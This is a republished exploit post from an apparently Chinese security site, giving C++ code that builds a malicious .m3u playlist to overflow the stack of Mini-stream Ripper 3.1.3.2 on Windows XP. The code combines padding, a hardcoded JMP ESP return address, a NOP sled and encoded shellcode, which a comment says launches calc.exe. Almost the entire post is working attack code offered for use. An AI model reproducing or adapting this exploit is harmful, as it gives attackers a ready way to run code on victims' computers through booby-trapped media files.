Mini-stream Ripper [.m3u] 3.1.3.2 buffer overflow vulnnerability
|
来源:vfocus.net 作者:Ayrbyte 发布时间:2012-04-06
|
|
///////////////////////////////////////////////////////////////////////////////////// // Mini-stream Ripper Version 3.1.3.2.2010.06.13 buffer overflow vulnnerability // Exploit Title: Mini-stream Ripper [.m3u] 3.1.3.2 buffer overflow vulnnerability // Author: Ayrbyte // Vendor or Software Link: Mini-stream Ripper™ // Link : http://mini-stream.net/mini-stream-ripper/download/ // Version: 3.1.3.2.2010.06.13 // Category: local // Tested on: Windows XP sp 2 // Code: c++ // Greetz To: <--xerkusR--WPFr--3|_M1X--H4mz_JR--Kira--Ch0lise7en--> /////////////////////////////////////////////////////////////////////////////////////
#include <cstdio> #include <iostream> using namespace std;
int main() { char header[] = "http://."; char buff[] = "\x41"; /* C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9\comctl32.dll JMP ESP */ char eip[] = "\x6A\x34\x3F\x77"; char nop[] = "\x90"; //execute calc.exe char shellcode[] = "\xdb\xd7\xd9\x74\x24\xf4\xb8\x79\xc4\x64\xb7\x33\xc9\xb1\x38" "\x5d\x83\xc5\x04\x31\x45\x13\x03\x3c\xd7\x86\x42\x42\x3f\xcf" "\xad\xba\xc0\xb0\x24\x5f\xf1\xe2\x53\x14\xa0\x32\x17\x78\x49" "\xb8\x75\x68\xda\xcc\x51\x9f\x6b\x7a\x84\xae\x6c\x4a\x08\x7c" "\xae\xcc\xf4\x7e\xe3\x2e\xc4\xb1\xf6\x2f\x01\xaf\xf9\x62\xda" "\xa4\xa8\x92\x6f\xf8\x70\x92\xbf\x77\xc8\xec\xba\x47\xbd\x46" "\xc4\x97\x6e\xdc\x8e\x0f\x04\xba\x2e\x2e\xc9\xd8\x13\x79\x66" "\x2a\xe7\x78\xae\x62\x08\x4b\x8e\x29\x37\x64\x03\x33\x7f\x42" "\xfc\x46\x8b\xb1\x81\x50\x48\xc8\x5d\xd4\x4d\x6a\x15\x4e\xb6" "\x8b\xfa\x09\x3d\x87\xb7\x5e\x19\x8b\x46\xb2\x11\xb7\xc3\x35" "\xf6\x3e\x97\x11\xd2\x1b\x43\x3b\x43\xc1\x22\x44\x93\xad\x9b" "\xe0\xdf\x5f\xcf\x93\xbd\x35\x0e\x11\xb8\x70\x10\x29\xc3\xd2" "\x79\x18\x48\xbd\xfe\xa5\x9b\xfa\xf1\xef\x86\xaa\x99\xa9\x52" "\xef\xc7\x49\x89\x33\xfe\xc9\x38\xcb\x05\xd1\x48\xce\x42\x55" "\xa0\xa2\xdb\x30\xc6\x11\xdb\x10\xa5\ xaf\x7f\xcc\x43\xa1\x1b" "\x9d\xe4\x4e\xb8\x32\x72\xc3\x34\xd0\xe9\x10\x87\x46\x91\x37" "\x8b\x15\x7b\xd2\x2b\xbf\x83";
//Make Exploit File FILE *teksfile; teksfile = fopen("Ayrbyte.m3u", "w"); fputs(header, teksfile); for(int i=0; i < 17416; i++) { fputs(buff, teksfile); } fputs(eip, teksfile); for(int i=0; i < 32; i++) { fputs(nop, teksfile); } fputs(shellcode, teksfile); fclose(teksfile); return 0; }
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|
|
|
|
推荐广告 |
|
|
|
|